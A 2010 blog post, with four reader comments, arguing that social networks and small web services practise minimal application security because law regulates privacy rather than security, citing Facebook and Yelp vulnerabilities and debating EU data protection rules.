Friday, May 21, 2010

Facebook and Security Minimalism

Facebook can't seem to catch a break. Just this Wednesday an XSRF bug was announced that gave access to birthdates users had designated as private.

Not that Facebook users care. I would bet dollars to proverbial donuts that no more than 0.01% of Facebook users has ever heard of XSRF. And more importantly, I would bet that almost none of them has really suffered from these vulnerabilities. Bad security in social networks is a non-story. Lax privacy policies, on the other hand, are much more in your face. No user is going to notice an insecure version of Python running on your webserver. But share their data with unauthorized contacts and the same user might go beserk.

User apathy notwithstanding, Facebook is making some half-hearted attempts to calm the masses. The company announced last Thursday the ability to limit the devices from which an account can be accessed. But this attempt to soothe the raging Facebook villagers with sharpened pitchforks is misdirected. Users are concerned about who Facebook is sharing their information with, not how. Device authentication - a poor man's security control at the best of times - is an unnecessary inconvenience to the vast majority of users and an insufficient safety control for the truly paranoid.

Facebook are not fools of course. You don't build a business that engages every tenth adult on the planet without honing a pretty good sense for which way the wind is blowing. The company realizes that it is under no obligation to provide any real security controls to its users. Providing window dressing security such as device authentication is a good way to appear conscientious to a public that tends to conflate security with privacy. And in any case, the risk that device authentication addresses - preventing User A from logging in as User B - is the one area where Facebook and its users have a common interest.

So Facebook's mission is not entirely at odds with security. Facebook has an interest in providing application security insofar as it does not impede its vision of becoming the web's authoritative social platform (more on that in a bit). But beyond that, why would Facebook provide security that involves substantial resources or limits its collaborative abilities? Facebook may throw its users a security bone when in comes on the cheap, but the company is under no obligation to provide anything beefier.

Really? Here is a simple fact most security folks won't like - unless you are in a regulated industry you are under almost no specific obligation to offer secure web applications. Unlike privacy regulations, this statement is true across all major jurisdictions. Laws will limit who you can share data with, and in some cases like children whether information can be collected to begin with. But they impose virtually no requirements on small businesses on how or even whether they need to secure their data.

This means that anybody can fire up a web application and start collecting, storing, and processing data that may or may not be sensitive to its owner. And they can do this while being under almost no legal or business requirement to provide adequate security.

With hosting costs approaching zero and development frameworks hiding the uglier layers of the stack, this means that any old schmo can be in business in no time. Just like you can blog on Blogger without touching any code, you can now build some pretty impressive quasi-professional web apps without touching any real code. Millions of people have done exactly that.

But what about big apps? Surely the ubiquitous brand name web applications are subject to some sort of control that two guys in their garage are not? Well, not really. The fact is that many web 2.0 apps that are in common enterprise use are probably not more than 5 or 10 guys. They may look like big businesses, but the beauty of the Internet is the ability for small organizations to amplify their presence and take on the trappings of the big boys.

Today there are gazillions of sites out there that will do anything from storing files to reformatting reports that are operating with almost zero intentional application security. And its not just small or medium sized businesses. Even the big players are, at the end of the day, only subject to restriction on who they can share data with. Having mostly evolved from small start-up operations, they take an understandably minimalist approach to information security. Application security - in stark contrast to privacy - is basically a good faith effort.

The kerfuffle around Google's recent StreetView-wifi snafu is a good example of the priority of privacy over security. Apparently Google's StreetView had collected information from open wifi networks. Google has attracted a great deal of negative press and is facing numerous investigations in Germany and elsewhere for this. At the same time, the numerous security vulnerabilities that are frequently exposed at most large companies hardly register on the legal radar screen, and is certainly not something that will get investigated. You don't trigger an EU investigation by having too many bugs to patch in a given release or by using a vulnerable version of PHP.

The More Social, The Less Secure

That's not to say that security and privacy are totally unrelated in social networks. If Facebook wants to build a platform that others can plug into, it necessarily opens the application to vulnerabilities. A very good example of this is the recent hiccup with Yelp. Facebook's Instant Personalization exposed users to a cross-site-scripting vulnerability on Yelp that could harvest user data. Without the Yelp integration, this vulnerability would never have happened.

When it comes to social networks, there is no free security lunch. Collaborative services are by definition less secure. Facebook is meant to be collaborative and thus can never offer the same level of security as a more gated service. This is the same reason that Times Square cannot be secured in the same way an airport can. One is meant to be open and one is meant to be closed, or at least controlled. Although hundreds of security vendors may try to secure web 2.0 applications, robust security and social collaboration are ultimately opposing aims.

Of course there are numerous technological standards that are being built precisely to secure the web 2.0 world. The move to OAuth from BasicAuth (a transition that Twitter will be enforcing next month) is a good example. But from a business perspective, the raison d'etre of most social applications is the collaboration, not the security. When web services communicate, there is generally only one level of authentication required to reach the crown jewels. Unlike traditional applications, most web services only require one screw-up or misconfiguration to expose your data.

Social Media vs the Enterprise

This single-line-of-defense approach that most web 2.0 applications take is sufficient for most individual personal data. Your Facebook settings may limit photos of you drinking at a keg party from your work colleagues, but their accidental exposure is not such a big deal and is a risk most users are willing to assume. In our personal lives, there is no breach notification, limited personal financial liability, and a much lower expectation of due care. Even the recent mess-up exposing your friends' private chats on Facebook is probably met with a stuff-happens shrug by everyone not directly affected.

But enterprises should - in theory - be more cautious. Breaches can carry real costs, financial liability is more substantial, and there are often contractual obligations to provide security. Indeed while there might be no affirmative legal obligation for application providers to provide security, customers may very well be prevented from using their services if there is insufficient security. After all, most enterprises that deal in personal data are under some form of contractual obligation to reasonably protect that data.

Will this raise the bar for small providers of cloud services? Unlikely. As I have frequently ranted about in the past, in non-regulated industries these obligations usually refer to some dinosaur-like provisions about SSL and biometric readers at server room entrances. Unless a company is truly conscientious about applying the meaning of due and reasonable care, there are practically no legal or contractual security requirements to which web applications are subject. (This is of course not true of heavily regulated industries like finance, but most corporations are operating in much more loosely regulated spaces).

Many enterprises are driving full steam ahead with the integration of minimally secured third party web applications into the enterprise. The transition from walled-off silo to full member of the application ecosystem is well underway. We may not be in a Jericho-Forum world of perimeterless utopia, but we are in the awkward teenage state of integrating our IT environment with hundreds of smaller companies - through APIs, SDKs, and the like.

Much like real life, digital hookups put enterprises at risk - you no longer have to worry just about who you are with, but everyone they have been with and will be with in the future. And just like real life, the process of evaluating the safety of a potential application hookup is largely heuristic. With an increasingly promiscuous digital environment, we lose the ability to do a full battery of tests on each potential partner (and belated apologies for the lame analogy).

For individuals, the risks of collaborative web services are far outweighed by the benefits. That's the reason that Facebook has 400 million users and why thousands of popular applications with only the thinnest veneer of authentication thrive. This risk calculus will also hold for many enterprises, both large and small. For more security heavy environments, however, fundamental changes will be needed. For some environments it will take a lot more than device authentication to make today's handy web applications ready for enterprise prime time.

4 comments:

  1. The blog entry states:
    "Here is a simple fact most security folks won't like - unless you are in a regulated industry you are under almost no specific obligation to offer secure web applications. Unlike privacy regulations, this statement is true across all major jurisdictions."

    I don't agree with that statement - or I have not understood it correctly.

    The European Union (EU) requires that anybody who processes personal data (including through websites) of EU citizens is required to implement appropriate measures to protect this data. The painful details are below!

    Article 17 of the EU Data Protection Directive (95/46/EC) states:

    "Member States shall provide that the controller must implement appropriate technical and organizational measures to protect personal data against accidental or unlawful destruction or accidental loss, alteration, unauthorized disclosure or access, in particular where the processing involves the transmission of data over a network, and against all other unlawful forms of processing."

    EU countries have adopted this directive into their own national Date Protection legislation. So if somebody creates a website to processes personal information in an EU country they need to "implement appropriate technical and organizational measures to protect personal data". I certainly agree that the requirements are hopelessly vague - what does "appropriate" mean? However any website that processes personal information belonging to EU citizens needs to comply with this Data Protection legislation. In fact Facebook, Google etc do agree to comply with the European Data Protection legislation in a roundabout way through the "Safe Harbor" program.

    Here are some links:

    EU Data Protection Directive (95/46/EC):
    http://eur-lex.europa.eu/Notice.do?val=307229:cs&lang=en&list=307229:cs,&pos=1&page=1&nbl=1&pgs=10&hwords=95/46/EC~&checktexte=checkbox&visu=#texte


    Safe Harbor Program:
    https://www.export.gov/safehrbr/list.aspx

    If you go to the google Entry at
    http://www.export.gov/safehrbr/companyinfo.aspx?id=8321
    you will see that Google answers Yes to the question "Do you agree to cooperate and comply with the European Data Protection Authorities?"

    Question 9 in the following document from the UK Information Commissioner mentions websites specifically :
    http://www.ico.gov.uk/upload/documents/library/data_protection/practical_application/collecting_personal_information_from_websites_v1.0.pdf

    Q:"We collect personal information through our website. Do we have to use an encryption-based transmission system?"

    A:"You are responsible for processing personal information securely. You must adopt appropriate technical and organisational measures to protect the information you collect."


    Alexis

    ReplyDelete
  2. Thanks Alexis for the detailed and informative comment.

    The way I see it, the EU regulations and notices you cite in fact underscore the non-existence of even general technical legal requirements to secure applications. The only thing they seem to preclude is publicly posting personal information in a directly accessible way on a website, which no one would really do in practice anyhow. Almost all applications require some sort of authentication, however weak, for business reasons.

    The fact that in its FAQ the UK Information Commissioner document that you cite does not even require SSL for personal information in transit shows just how non-committal this requirement for appropriate measures really is.

    ReplyDelete
  3. You wrote: "For more security heavy environments, however, fundamental changes will be needed."

    In your view, what type of "fundamental changes" will be needed?

    Thanks,
    Doron.

    ReplyDelete
  4. @Doron - A stated security policy is the first step. Most third party providers have privacy policies because they are required to. But most still do not have an even basic security policy describing what they do to address standard security issues - patching, secure development processes, internal access control, configurations, etc.

    Providers who until now have offered services either for free or for consumer level prices (the $10/month type apps) have usually not prioritized - or in many cases even thought about - these issues. For them forming a security narrative that is ready for regulated enterprises is more than just a documentation exercise. It really requires a 180 in a lot of processes.

    ReplyDelete

Note: Only a member of this blog may post a comment.